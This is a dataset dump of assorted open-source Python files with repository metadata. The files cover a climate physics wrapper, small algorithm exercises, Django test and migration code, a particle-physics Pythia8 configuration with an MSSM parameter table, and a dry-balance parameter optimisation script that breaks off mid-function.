where <args> are the following REQUIRED arguments:
Name Dims Meaning Units Default Notes
U 3 zonal winds ms-1
V 3 meridional winds ms-1
T 3 temperature K
p 3 atmospheric pressure Pa
pint 3 Pressure at model interfaces Pa
q 3 specific humidity g kg-1
ps 2 surface pressure Pa
* Outputs that are accessible as sp.<Name>
Name Dims Meaning Units Default Notes
Udot 3 zonal wind tendency ms-2
Vdot 3 meridional wind tendency ms-2
Tdot 3 temperature tendency Ks-1
qdot 3 humidity tendency g kg-1
precc 2 precipitation
"""
def __init__(self, **kwargs):
self.Name = 'simple_physics'
self.LevType = 'p'
self.SteppingScheme = 'explicit'
self.ToExtension = ['U', 'V', 'T', 'p', 'pint', 'q', 'ps']
self.Required = ['U', 'V', 'T', 'p', 'pint', 'q', 'ps']
self.FromExtension = ['Uinc', 'Vinc', 'Tinc', 'qinc', 'precc']
self.Prognostic = ['U', 'V', 'T', 'q']
self.Diagnostic = ['precc']
if 'grid' not in kwargs:
kwargs['grid'] = Grid(self,**kwargs)
time_step = 0
if 'dt' not in kwargs:
raise IndexError, '\n\n dt is a required argument'
nlevs = kwargs['grid']['nlev']
nlats = kwargs['grid']['nlat']
nlons = kwargs['grid']['nlon']
time_step = kwargs['dt']
phys.init_simple_physics(1, nlons, nlats, nlevs, time_step, kwargs)
Component.__init__(self,**kwargs)
def driver(self, u, v, temp, p, pint, q, ps, simTime=-1):
'''
Returns the tendencies for a simplified moist physics simulation
'''
latitudes = self.Grid['lat']
nlats = self.Grid['nlat']
nlons = self.Grid['nlon']
lons,lats,levs = u.shape
assert lons == nlons
assert lats == nlats
u_tend = np.zeros(u.shape)
v_tend = np.zeros(v.shape)
t_tend = np.zeros(temp.shape)
q_tend = np.zeros(q.shape)
precip = np.zeros((nlons,nlats))
t_out, u_out, v_out, q_out, precip_out = \
phys.get_tendencies(u, v, temp,
p, pint, q,
ps, latitudes)
return u_out,v_out,t_out,q_out,precip_out
| [
"[email protected]"
] | |
4b642e6a61f839f7027c9f80ffb3381877982af2 | d63c503df093f4a6f2e4f5fa796c4864a4418461 | /subarray.py | 27c8cbb61999db7937c16409f9634e6da000b139 | [] | no_license | 99rishita/Geeksforgeeks | 963e4c9d484cd615e7ffb7f640d712f15cb7ad3e | ece2da9e1a5f39a54de4af4ee13913e67b10745e | refs/heads/master | 2022-12-29T04:28:11.004559 | 2020-10-02T18:24:39 | 2020-10-02T18:24:39 | 277,882,127 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 460 | py | def subarraysum(arr, k):
sum = 0
for i in range(0, len(arr)):
sum = arr[i]
#j = i+1
for j in range(i+1, len(arr)):
sum = sum + arr[j]
if sum > k:
break
if sum == k:
print(i+1)
print(j+1)
return
#arr = [1,2,3,7,5]
#k = 12
#arr = [1,2,3,4,5,6,7,8,9,10]
#k = 15
arr = [1, 4, 20, 3, 10, 5]
k = 33
subarraysum(arr, k)
| [
"[email protected]"
] | |
edcde8943da6aedbe6d9cb618303471335c58763 | 2da355c3e63d911995bd5661100d858ceeae5493 | /python_data/Chapter 7/P/P-7.45.py | 264f3ee6748288442c770f7725f1dce5236145c1 | [] | no_license | allenxzy/Data-and-Structures-and-Alogrithms | 1f72e7471f7d8f8982985986eda57f896e73087d | 5977ea9434b42032069b24a538f455067ef38283 | refs/heads/master | 2021-01-16T21:46:24.199337 | 2016-12-14T08:05:40 | 2016-12-14T08:05:40 | 60,823,594 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 566 | py | #-*-coding: utf-8 -*-
"""
An array A is sparse if most of its entries are empty (i.e., None). A list
L can be used to implement such an array efficiently. In particular, for
each nonempty cell A[i], we can store an entry (i,e) in L, where e is the
element stored at A[i]. This approach allows us to represent A using O(m)
storage, where m is the number of nonempty entries in A. Provide such
a SparseArray class that minimally supports methods__getitem__(j) and
__setitem__(j, e) to provide standard indexing operations. Analyze the
efficiency of these methods.
""" | [
"[email protected]"
] | |
92d622b8979f7189633fda47981ae316e0f50bb1 | c4efe9f6416f989524fafb128525a0a71272f680 | /python/python-test.py | a0fc2d56f0ca9636405a5daa8bf9512c4329afe5 | [] | no_license | drautb/sketchbook | dcc6eb586ffe739ee21ab74aa6b045073d38fc6b | 12255fc3cc5c2cbccbc174333c76c339d9846d67 | refs/heads/master | 2023-07-27T10:05:40.737633 | 2023-07-25T19:18:32 | 2023-07-25T19:18:32 | 28,785,534 | 4 | 3 | null | 2023-03-07T03:15:24 | 2015-01-04T20:46:06 | C++ | UTF-8 | Python | false | false | 1,712 | py | """
Determine which elements in each array are not present in the other.
Numbers in array 1 that aren't in array 2:
<num1> <num2> <num3>...
Numbers in array 2 that aren't in array 1:
<num1> <num2> <num3>...
"""
def reconcileHelper(arr_a, arr_b):
in_a_not_b = []
in_b_not_a = []
# Some effort is wasted by subtracting both arrays from eachother.
# Instead, sort both arrays up front, (2 * NlogN) then iterate over them in parallel,
# noting which items are skipped in each array as we go.
arr_a.sort()
arr_b.sort()
a_len = len(arr_a)
b_len = len(arr_b)
arr_a_idx = 0
arr_b_idx = 0
while arr_a_idx < a_len and arr_b_idx < b_len:
# If the current element is in both, move on.
a_val = arr_a[arr_a_idx]
b_val = arr_b[arr_b_idx]
if a_val == b_val:
arr_a_idx += 1
arr_b_idx += 1
continue
# If they're not the same, record the lower one as a difference,
# and increment only that index.
if a_val < b_val:
in_a_not_b.append(a_val)
arr_a_idx += 1
else:
in_b_not_a.append(b_val)
arr_b_idx += 1
# There may have been some numbers left at the end of one of the lists.
# We need to add these to the difference.
if arr_a_idx < a_len:
in_a_not_b += arr_a[arr_a_idx:]
elif arr_b_idx < b_len:
in_b_not_a += arr_b[arr_b_idx:]
print("Numbers in array 1 that aren't in array 2:")
print_array(in_a_not_b)
print("Numbers in array 2 that aren't in array 1:")
print_array(in_b_not_a)
return
def print_array(arr):
for n in arr:
print("%d" % n, end=" ")
print("") | [
"[email protected]"
] | |
cf57d9388cb7e3d352c181533f5217e8ac7d4f9a | 95d73f1daebb98fe6707b999c9763f3b84d418a4 | /cms/tests/mail.py | 1b5281d7451060ae56a54f9cbb7b5364631a6269 | [] | no_license | leotop/django_ukrhim | 8e01e284076878c7691986d5e8d056795d2bb900 | e5a60a79f441ae732350e518f9b71e2724dc010a | refs/heads/master | 2021-01-22T15:51:27.617651 | 2015-01-23T11:00:37 | 2015-01-23T11:00:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | # -*- coding: utf-8 -*-
from cms.api import create_page_user
from cms.test_utils.testcases import CMSTestCase
from cms.utils.mail import mail_page_user_change
from django.core import mail
from django.contrib.auth.models import User
class MailTestCase(CMSTestCase):
def setUp(self):
mail.outbox = [] # reset outbox
def test_mail_page_user_change(self):
user = User.objects.create_superuser("username", "[email protected]", "username")
user = create_page_user(user, user, grant_all=True)
mail_page_user_change(user)
self.assertEqual(len(mail.outbox), 1)
| [
"[email protected]"
] | |
060ffffdae42855cbce9c3ae529ae8e62c711b23 | 8b187f3d60446b39a8f2ba976688ed493798fc64 | /portal/migrations/0007_note.py | 755564f8c5a2e3459cdfe33a6edeb0a0548dbaf1 | [] | no_license | JackSnowdon/JobHunter | 4eb8c5bd2e5cf7c97ca5b29f697e8f95d98a5bb3 | a2c87a6a7b14fd5231b6d99502a638ea702015a4 | refs/heads/master | 2022-12-19T07:27:39.354155 | 2020-10-02T17:32:00 | 2020-10-02T17:32:00 | 297,356,936 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 732 | py | # Generated by Django 3.1.1 on 2020-09-25 15:16
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('portal', '0006_job_last_updated'),
]
operations = [
migrations.CreateModel(
name='Note',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField()),
('created_on', models.DateTimeField(auto_now_add=True)),
('job', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='noted', to='portal.job')),
],
),
]
| [
"[email protected]"
] | |
054f5b6be278fe0dba1a08e780741e122cf03e7b | 0fccee4c738449f5e0a8f52ea5acabf51db0e910 | /genfragments/ThirteenTeV/MSSM_HiggsToMuMu/fragment_mhmodp_MA200_tb35_bbH.py | cdf690cfcd661d342bf12d8168bd138c8e77a780 | [] | no_license | cms-sw/genproductions | f308ffaf3586c19b29853db40e6d662e937940ff | dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4 | refs/heads/master | 2023-08-30T17:26:02.581596 | 2023-08-29T14:53:43 | 2023-08-29T14:53:43 | 11,424,867 | 69 | 987 | null | 2023-09-14T12:41:28 | 2013-07-15T14:18:33 | Python | UTF-8 | Python | false | false | 16,464 | py | COM_ENERGY = 13000.0 # GeV
CROSS_SECTION = 1 # pb
PROCESS = 'HiggsBSM:gg2H2bbbar = on'
SLHA_TABLE = """BLOCK SPINFO
1 FeynHiggs
2 2.12.0
2 built on ott 13, 2016
BLOCK MODSEL
1 0 # Model
2 1 # GridPts
3 0 # Content
4 0 # RPV
5 0 # CPV
6 0 # FV
BLOCK SMINPUTS
1 1.28952828E+02 # invAlfaMZ
2 1.16637000E-05 # GF
3 1.19000000E-01 # AlfasMZ
4 9.11876000E+01 # MZ
5 4.16000000E+00 # Mb
6 1.73200000E+02 # Mt
7 1.77703000E+00 # Mtau
11 5.10998902E-04 # Me
13 1.05658357E-01 # Mmu
21 6.00000000E-03 # Md
22 3.00000000E-03 # Mu
23 9.50000000E-02 # Ms
24 1.28600000E+00 # Mc
BLOCK MINPAR
3 3.50000000E+01 # TB
BLOCK EXTPAR
0 0.00000000E+00 # Q
1 9.54716519E+01 # M1
2 2.00000000E+02 # M2
3 1.50000000E+03 # M3
11 1.50571429E+03 # At
12 1.50571429E+03 # Ab
13 1.50571429E+03 # Atau
23 2.00000000E+02 # MUE
25 3.50000000E+01 # TB
26 2.00000000E+02 # MA0
27 2.15554723E+02 # MHp
31 5.00000000E+02 # MSL(1)
32 5.00000000E+02 # MSL(2)
33 1.00000000E+03 # MSL(3)
34 5.00000000E+02 # MSE(1)
35 5.00000000E+02 # MSE(2)
36 1.00000000E+03 # MSE(3)
41 1.50000000E+03 # MSQ(1)
42 1.50000000E+03 # MSQ(2)
43 1.00000000E+03 # MSQ(3)
44 1.50000000E+03 # MSU(1)
45 1.50000000E+03 # MSU(2)
46 1.00000000E+03 # MSU(3)
47 1.50000000E+03 # MSD(1)
48 1.50000000E+03 # MSD(2)
49 1.00000000E+03 # MSD(3)
BLOCK MASS
1000012 4.95831819E+02 # MSf(1,1,1)
1000011 5.02297238E+02 # MSf(1,2,1)
2000011 5.01844888E+02 # MSf(2,2,1)
1000002 1.49902682E+03 # MSf(1,3,1)
2000002 1.49958921E+03 # MSf(2,3,1)
1000001 1.50117796E+03 # MSf(1,4,1)
2000001 1.50020517E+03 # MSf(2,4,1)
1000014 4.95831819E+02 # MSf(1,1,2)
1000013 5.02841028E+02 # MSf(1,2,2)
2000013 5.01300040E+02 # MSf(2,2,2)
1000004 1.49902736E+03 # MSf(1,3,2)
2000004 1.49958977E+03 # MSf(2,3,2)
1000003 1.50122273E+03 # MSf(1,4,2)
2000003 1.50016037E+03 # MSf(2,4,2)
1000016 9.97922438E+02 # MSf(1,1,3)
1000015 9.96148789E+02 # MSf(1,2,3)
2000015 1.00590492E+03 # MSf(2,2,3)
1000006 8.76425392E+02 # MSf(1,3,3)
2000006 1.13477936E+03 # MSf(2,3,3)
1000005 9.90691930E+02 # MSf(1,4,3)
2000005 1.01129043E+03 # MSf(2,4,3)
25 1.25061212E+02 # Mh0
35 2.00246931E+02 # MHH
36 2.00000000E+02 # MA0
37 2.18628426E+02 # MHp
1000022 8.84634445E+01 # MNeu(1)
1000023 1.52251009E+02 # MNeu(2)
1000025 -2.10570836E+02 # MNeu(3)
1000035 2.65328034E+02 # MNeu(4)
1000024 1.49028243E+02 # MCha(1)
1000037 2.65929050E+02 # MCha(2)
1000021 1.50000000E+03 # MGl
BLOCK DMASS
0 1.73200000E+02 # Q
25 7.35389733E-01 # Delta Mh0
35 7.56649161E-03 # Delta MHH
36 0.00000000E+00 # Delta MA0
37 2.79510476E-01 # Delta MHp
BLOCK NMIX
1 1 9.33994702E-01 # ZNeu(1,1)
1 2 -1.09656980E-01 # ZNeu(1,2)
1 3 3.08336463E-01 # ZNeu(1,3)
1 4 -1.43380155E-01 # ZNeu(1,4)
2 1 -3.12041908E-01 # ZNeu(2,1)
2 2 -6.93332183E-01 # ZNeu(2,2)
2 3 5.13911163E-01 # ZNeu(2,3)
2 4 -3.97260177E-01 # ZNeu(2,4)
3 1 9.78754166E-02 # ZNeu(3,1)
3 2 -1.36323085E-01 # ZNeu(3,2)
3 3 -6.77823330E-01 # ZNeu(3,3)
3 4 -7.15815585E-01 # ZNeu(3,4)
4 1 -1.43889355E-01 # ZNeu(4,1)
4 2 6.99057828E-01 # ZNeu(4,2)
4 3 4.25886693E-01 # ZNeu(4,3)
4 4 -5.56088600E-01 # ZNeu(4,4)
BLOCK UMIX
1 1 -6.05777723E-01 # UCha(1,1)
1 2 7.95633930E-01 # UCha(1,2)
2 1 7.95633930E-01 # UCha(2,1)
2 2 6.05777723E-01 # UCha(2,2)
BLOCK VMIX
1 1 -7.95633930E-01 # VCha(1,1)
1 2 6.05777723E-01 # VCha(1,2)
2 1 6.05777723E-01 # VCha(2,1)
2 2 7.95633930E-01 # VCha(2,2)
BLOCK STAUMIX
1 1 6.98837569E-01 # USf(1,1)
1 2 7.15280401E-01 # USf(1,2)
2 1 7.15280401E-01 # USf(2,1)
2 2 -6.98837569E-01 # USf(2,2)
BLOCK STOPMIX
1 1 7.08253316E-01 # USf(1,1)
1 2 -7.05958385E-01 # USf(1,2)
2 1 7.05958385E-01 # USf(2,1)
2 2 7.08253316E-01 # USf(2,2)
BLOCK SBOTMIX
1 1 6.81625021E-01 # USf(1,1)
1 2 7.31701667E-01 # USf(1,2)
2 1 7.31701667E-01 # USf(2,1)
2 2 -6.81625021E-01 # USf(2,2)
BLOCK ALPHA
-6.23852387E-02 # Alpha
BLOCK DALPHA
9.33262428E-04 # Delta Alpha
BLOCK HMIX Q= -0.99900000E+03
1 2.00000000E+02 # MUE
2 3.50000000E+01 # TB
BLOCK MSOFT Q= 0.00000000E+00
1 9.54716519E+01 # M1
2 2.00000000E+02 # M2
3 1.50000000E+03 # M3
31 5.00000000E+02 # MSL(1)
32 5.00000000E+02 # MSL(2)
33 1.00000000E+03 # MSL(3)
34 5.00000000E+02 # MSE(1)
35 5.00000000E+02 # MSE(2)
36 1.00000000E+03 # MSE(3)
41 1.50000000E+03 # MSQ(1)
42 1.50000000E+03 # MSQ(2)
43 1.00000000E+03 # MSQ(3)
44 1.50000000E+03 # MSU(1)
45 1.50000000E+03 # MSU(2)
46 1.00000000E+03 # MSU(3)
47 1.50000000E+03 # MSD(1)
48 1.50000000E+03 # MSD(2)
49 1.00000000E+03 # MSD(3)
BLOCK AE Q= 0.00000000E+00
1 1 0.00000000E+00 # Af(1,1)
2 2 0.00000000E+00 # Af(2,2)
3 3 1.50571429E+03 # Af(3,3)
BLOCK AU Q= 0.00000000E+00
1 1 0.00000000E+00 # Af(1,1)
2 2 0.00000000E+00 # Af(2,2)
3 3 1.50571429E+03 # Af(3,3)
BLOCK AD Q= 0.00000000E+00
1 1 0.00000000E+00 # Af(1,1)
2 2 0.00000000E+00 # Af(2,2)
3 3 1.50571429E+03 # Af(3,3)
BLOCK YE Q= 0.00000000E+00
1 1 1.02767518E-04 # Yf(1,1)
2 2 2.12490616E-02 # Yf(2,2)
3 3 3.57380343E-01 # Yf(3,3)
BLOCK YU Q= 0.00000000E+00
1 1 1.72380888E-05 # Yf(1,1)
2 2 7.38939405E-03 # Yf(2,2)
3 3 9.95212324E-01 # Yf(3,3)
BLOCK YD Q= 0.00000000E+00
1 1 1.16496188E-03 # Yf(1,1)
2 2 1.84438794E-02 # Yf(2,2)
3 3 7.52835453E-01 # Yf(3,3)
BLOCK VCKMIN
1 2.25300000E-01 # lambda
2 8.08000000E-01 # A
3 1.32000000E-01 # rhobar
4 3.41000000E-01 # etabar
BLOCK MSL2 Q= 0.00000000E+00
1 1 2.50000000E+05 # MSL2(1,1)
2 2 2.50000000E+05 # MSL2(2,2)
3 3 1.00000000E+06 # MSL2(3,3)
BLOCK MSE2 Q= 0.00000000E+00
1 1 2.50000000E+05 # MSE2(1,1)
2 2 2.50000000E+05 # MSE2(2,2)
3 3 1.00000000E+06 # MSE2(3,3)
BLOCK MSQ2 Q= 0.00000000E+00
1 1 2.25000000E+06 # MSQ2(1,1)
2 2 2.25000000E+06 # MSQ2(2,2)
3 3 1.00000000E+06 # MSQ2(3,3)
BLOCK MSU2 Q= 0.00000000E+00
1 1 2.25000000E+06 # MSU2(1,1)
2 2 2.25000000E+06 # MSU2(2,2)
3 3 1.00000000E+06 # MSU2(3,3)
BLOCK MSD2 Q= 0.00000000E+00
1 1 2.25000000E+06 # MSD2(1,1)
2 2 2.25000000E+06 # MSD2(2,2)
3 3 1.00000000E+06 # MSD2(3,3)
BLOCK TE Q= 0.00000000E+00
1 1 0.00000000E+00 # Tf(1,1)
2 2 0.00000000E+00 # Tf(2,2)
3 3 5.38112689E+02 # Tf(3,3)
BLOCK TU Q= 0.00000000E+00
1 1 0.00000000E+00 # Tf(1,1)
2 2 0.00000000E+00 # Tf(2,2)
3 3 1.49850541E+03 # Tf(3,3)
BLOCK TD Q= 0.00000000E+00
1 1 0.00000000E+00 # Tf(1,1)
2 2 0.00000000E+00 # Tf(2,2)
3 3 1.13355510E+03 # Tf(3,3)
BLOCK SELMIX
1 1 9.99968990E-01 # UASf(1,1)
1 4 -7.87520591E-03 # UASf(1,4)
2 2 8.04210562E-01 # UASf(2,2)
2 5 -5.94344489E-01 # UASf(2,5)
3 3 6.98837569E-01 # UASf(3,3)
3 6 7.15280401E-01 # UASf(3,6)
4 1 7.87520591E-03 # UASf(4,1)
4 4 9.99968990E-01 # UASf(4,4)
5 2 5.94344489E-01 # UASf(5,2)
5 5 8.04210562E-01 # UASf(5,5)
6 3 7.15280401E-01 # UASf(6,3)
6 6 -6.98837569E-01 # UASf(6,6)
BLOCK USQMIX
1 1 1.00000000E+00 # UASf(1,1)
1 4 1.01654749E-05 # UASf(1,4)
2 2 9.99990506E-01 # UASf(2,2)
2 5 4.35747613E-03 # UASf(2,5)
3 3 7.08253316E-01 # UASf(3,3)
3 6 -7.05958385E-01 # UASf(3,6)
4 1 -1.01654749E-05 # UASf(4,1)
4 4 1.00000000E+00 # UASf(4,4)
5 2 -4.35747613E-03 # UASf(5,2)
5 5 9.99990506E-01 # UASf(5,5)
6 3 7.05958385E-01 # UASf(6,3)
6 6 7.08253316E-01 # UASf(6,6)
BLOCK DSQMIX
1 1 9.99903542E-01 # UASf(1,1)
1 4 -1.38891136E-02 # UASf(1,4)
2 2 9.78606924E-01 # UASf(2,2)
2 5 -2.05738883E-01 # UASf(2,5)
3 3 6.81625021E-01 # UASf(3,3)
3 6 7.31701667E-01 # UASf(3,6)
4 1 1.38891136E-02 # UASf(4,1)
4 4 9.99903542E-01 # UASf(4,4)
5 2 2.05738883E-01 # UASf(5,2)
5 5 9.78606924E-01 # UASf(5,5)
6 3 7.31701667E-01 # UASf(6,3)
6 6 -6.81625021E-01 # UASf(6,6)
BLOCK CVHMIX
1 1 9.99821551E-01 # UH(1,1)
1 2 1.88908885E-02 # UH(1,2)
1 3 0.00000000E+00 # UH(1,3)
2 1 -1.88908885E-02 # UH(2,1)
2 2 9.99821551E-01 # UH(2,2)
2 3 0.00000000E+00 # UH(2,3)
3 1 0.00000000E+00 # UH(3,1)
3 2 0.00000000E+00 # UH(3,2)
3 3 1.00000000E+00 # UH(3,3)
DECAY 25 1.16552325E-02 # Gamma(h0)
8.01722713E-04 2 22 22 # BR(h0 -> photon photon)
5.08826303E-04 2 22 23 # BR(h0 -> photon Z)
9.26595393E-03 2 23 23 # BR(h0 -> Z Z)
7.64511047E-02 2 -24 24 # BR(h0 -> W W)
2.19751651E-02 2 21 21 # BR(h0 -> gluon gluon)
8.18598960E-09 2 -11 11 # BR(h0 -> Electron electron)
3.64127353E-04 2 -13 13 # BR(h0 -> Muon muon)
1.02887205E-01 2 -15 15 # BR(h0 -> Tau tau)
6.89943016E-08 2 -2 2 # BR(h0 -> Up up)
9.55645326E-03 2 -4 4 # BR(h0 -> Charm charm)
1.25397048E-06 2 -1 1 # BR(h0 -> Down down)
3.14893481E-04 2 -3 3 # BR(h0 -> Strange strange)
7.77873217E-01 2 -5 5 # BR(h0 -> Bottom bottom)
DECAY 35 3.64820560E+00 # Gamma(HH)
-5.23846484E-07 2 22 22 # BR(HH -> photon photon)
-1.36982069E-07 2 22 23 # BR(HH -> photon Z)
-1.17507948E-04 2 23 23 # BR(HH -> Z Z)
-3.33880523E-04 2 -24 24 # BR(HH -> W W)
-5.51449801E-04 2 21 21 # BR(HH -> gluon gluon)
-1.10734452E-08 2 -11 11 # BR(HH -> Electron electron)
4.92636635E-04 2 -13 13 # BR(HH -> Muon muon)
-1.37311113E-01 2 -15 15 # BR(HH -> Tau tau)
-1.10499925E-12 2 -2 2 # BR(HH -> Up up)
-1.52979382E-07 2 -4 4 # BR(HH -> Charm charm)
-1.47299048E-06 2 -1 1 # BR(HH -> Down down)
-3.69878672E-04 2 -3 3 # BR(HH -> Strange strange)
-8.59288730E-01 2 -5 5 # BR(HH -> Bottom bottom)
-1.53250511E-03 2 1000022 1000022 # BR(HH -> neutralino1 neutralino1)
DECAY 36 3.66917725E+00 # Gamma(A0)
1.33971863E-07 2 22 22 # BR(A0 -> photon photon)
1.56816424E-07 2 22 23 # BR(A0 -> photon Z)
5.39627034E-04 2 21 21 # BR(A0 -> gluon gluon)
1.10021728E-08 2 -11 11 # BR(A0 -> Electron electron)
4.89466254E-04 2 -13 13 # BR(A0 -> Muon muon)
1.36454069E-01 2 -15 15 # BR(A0 -> Tau tau)
1.93510652E-13 2 -2 2 # BR(A0 -> Up up)
2.73412113E-08 2 -4 4 # BR(A0 -> Charm charm)
1.46372732E-06 2 -1 1 # BR(A0 -> Down down)
3.67552741E-04 2 -3 3 # BR(A0 -> Strange strange)
8.54600619E-01 2 -5 5 # BR(A0 -> Bottom bottom)
7.54613892E-03 2 1000022 1000022 # BR(A0 -> neutralino1 neutralino1)
7.34310308E-07 2 23 25 # BR(A0 -> Z h0)
DECAY 37 1.00298403E+00 # Gamma(Hp)
4.41935516E-08 2 -11 12 # BR(Hp -> Electron nu_e)
1.88941115E-03 2 -13 14 # BR(Hp -> Muon nu_mu)
5.34381118E-01 2 -15 16 # BR(Hp -> Tau nu_tau)
5.40534775E-06 2 -1 2 # BR(Hp -> Down up)
6.09130051E-05 2 -3 2 # BR(Hp -> Strange up)
3.37162440E-05 2 -5 2 # BR(Hp -> Bottom up)
2.48603840E-07 2 -1 4 # BR(Hp -> Down charm)
1.35263410E-03 2 -3 4 # BR(Hp -> Strange charm)
4.72115497E-03 2 -5 4 # BR(Hp -> Bottom charm)
9.01746986E-08 2 -1 6 # BR(Hp -> Down top)
2.23192733E-06 2 -3 6 # BR(Hp -> Strange top)
4.57401227E-01 2 -5 6 # BR(Hp -> Bottom top)
1.46474571E-04 2 24 25 # BR(Hp -> W h0)
2.57627491E-06 2 24 35 # BR(Hp -> W HH)
2.75456132E-06 2 24 36 # BR(Hp -> W A0)
DECAY 6 1.37127534E+00 # Gamma(top)
1.00000000E+00 2 5 24 # BR(top -> bottom W)
"""
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
pythiaPylistVerbosity = cms.untracked.int32(1),
filterEfficiency = cms.untracked.double(1),
pythiaHepMCVerbosity = cms.untracked.bool(False),
SLHATableForPythia8 = cms.string('%s' % SLHA_TABLE),
comEnergy = cms.double(COM_ENERGY),
crossSection = cms.untracked.double(CROSS_SECTION),
maxEventsToPrint = cms.untracked.int32(1),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
'Higgs:useBSM = on',
PROCESS,
'SLHA:allowUserOverride = off',
'SLHA:minMassSM = 100.',
'PhaseSpace:mHatMin = 56.0'
),
parameterSets = cms.vstring(
'pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters'
)
)
)
ProductionFilterSequence = cms.Sequence(generator)
| [
"[email protected]"
] | |
e691a2e11a5d7b6d2a79e68b58420dbe79373ac5 | 35e6598c8f07e686ef4ce431800ece28d2797568 | /analysis/interactive_dry_bal_optimisation.py | a7722cf5881b54476a2e0db7eef13a82f2802764 | [] | no_license | akuhnregnier/python-inferno | c7badbed505da602c98180e70aff05061dd1a199 | 424168231f553d0f872f1a2ec29c26bf3d114f08 | refs/heads/main | 2023-04-16T03:15:27.427407 | 2023-01-28T19:15:05 | 2023-01-28T19:15:05 | 368,221,337 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,052 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pathlib import Path
import matplotlib.pyplot as plt
import numpy as np
from loguru import logger
from matplotlib.widgets import Slider
from numba import njit, prange
from numpy.testing import assert_allclose
from scipy.optimize import minimize
from tqdm import tqdm
from python_inferno.basinhopping import BasinHoppingSpace
from python_inferno.configuration import N_pft_groups
from python_inferno.data import (
handle_param,
key_cached_calculate_grouped_vpd,
key_cached_precip_moving_sum,
load_single_year_cubes,
timestep,
)
from python_inferno.space import generate_space_spec
@njit(nogil=True, parallel=True, cache=True, fastmath=True)
def fewer_calculate_grouped_dry_bal(
*,
grouped_vpd,
cum_rain,
rain_f,
vpd_f,
# NOTE This is where the output is placed and should be an (Nt, N_pft_groups,
# land_pts) np.float64 array.
out,
):
Nt = grouped_vpd.shape[0]
assert rain_f.shape[0] == N_pft_groups
assert vpd_f.shape[0] == N_pft_groups
assert len(out.shape) == 3
assert out.shape[:2] == (Nt, N_pft_groups)
for l in prange(out.shape[2]):
for ti in range(Nt):
for i in range(N_pft_groups):
if ti == 0:
prev_dry_bal = 0
else:
prev_dry_bal = out[ti - 1, i, l]
vpd_val = grouped_vpd[ti, i, l]
new_dry_bal = (
prev_dry_bal
+ rain_f[i] * cum_rain[ti, l]
- (1 - np.exp(-vpd_f[i] * vpd_val))
)
if new_dry_bal < -1.0:
out[ti, i, l] = -1.0
elif new_dry_bal > 1.0:
out[ti, i, l] = 1.0
else:
out[ti, i, l] = new_dry_bal
return out
def get_fewer_climatological_grouped_dry_bal(
*,
filenames=tuple(
str(Path(s).expanduser())
for s in (
"~/tmp/new-with-antec5/JULES-ES.1p0.vn5.4.50.CRUJRA1.365.HYDE33.SPINUPD0.Instant.2010.nc",
"~/tmp/new-with-antec5/JULES-ES.1p0.vn5.4.50.CRUJRA1.365.HYDE33.SPINUPD0.Instant.2011.nc",
)
),
rain_f,
vpd_f,
verbose=False,
points=5,
):
"""Load instantaneous values from the files below, then calculate dry_bal, then
perform climatological averaging."""
rain_f = handle_param(rain_f)
vpd_f = handle_param(vpd_f)
clim_dry_bal = None
n_avg = 0
# Array used to store and calculate dry_bal.
grouped_dry_bal = None
for f in tqdm(
list(map(str, filenames)), desc="Processing dry_bal", disable=not verbose
):
data_dict = load_single_year_cubes(
filename=f,
variable_name_slices={
"t1p5m": (slice(None), slice(None), 0),
"q1p5m": (slice(None), slice(None), 0),
"pstar": (slice(None), 0),
"ls_rain": (slice(None), 0),
"con_rain": (slice(None), 0),
},
)
grouped_vpd = key_cached_calculate_grouped_vpd(
t1p5m_tile=data_dict["t1p5m"],
q1p5m_tile=data_dict["q1p5m"],
pstar=data_dict["pstar"],
# NOTE Special key used to store and retrieve memoized results.
cache_key=f,
)
cum_rain = key_cached_precip_moving_sum(
ls_rain=data_dict["ls_rain"],
con_rain=data_dict["con_rain"],
timestep=timestep,
# NOTE Special key used to store and retrieve memoized results.
cache_key=f,
)
if grouped_dry_bal is None:
# This array only needs to be allocated once for the first file.
grouped_dry_bal = np.zeros(
(data_dict["pstar"].shape[0], N_pft_groups, points), dtype=np.float64
)
# Calculate grouped dry_bal.
grouped_dry_bal = fewer_calculate_grouped_dry_bal(
grouped_vpd=grouped_vpd,
cum_rain=cum_rain,
rain_f=rain_f,
vpd_f=vpd_f,
out=grouped_dry_bal,
)
if clim_dry_bal is None:
clim_dry_bal = grouped_dry_bal
assert n_avg == 0
else:
clim_dry_bal += grouped_dry_bal
n_avg += 1
return clim_dry_bal / n_avg
space_template = dict(
rain_f=(1, [(0.5, 20.0)], float),
vpd_f=(1, [(1, 5000)], float),
)
space = BasinHoppingSpace(generate_space_spec(space_template))
# Histogram bins for `loss1`.
bins = np.linspace(-1, 1, 20)
# Need equally spaced bins.
bin_diff = np.diff(bins)[0]
assert_allclose(np.diff(bins), bin_diff)
# Histogram bins for `loss1`.
diff_bins = np.linspace(-2, 2, 10)
# Need equally spaced bins.
diff_bin_diff = np.diff(diff_bins)[0]
assert_allclose(np.diff(diff_bins), diff_bin_diff)
@njit(cache=True, nogil=True, parallel=True, fastmath=True)
def calc_loss1(*, dry_bal, bins, hists):
for i in prange(dry_bal.shape[1]):
hists[i] = np.histogram(dry_bal[:, i], bins=bins)[0]
hists /= dry_bal.shape[0] * (bins[1] - bins[0])
# Minimise the amount of variation between bins - all values should be represented
# as equally as possible.
# Normalise this metric by the number of samples.
return np.linalg.norm(hists - 0.5) / np.sqrt(hists.size)
def get_to_optimise(*, loss1_c, loss2_c, loss3_c):
def to_optimise(x):
dry_bal = get_fewer_climatological_grouped_dry_bal(
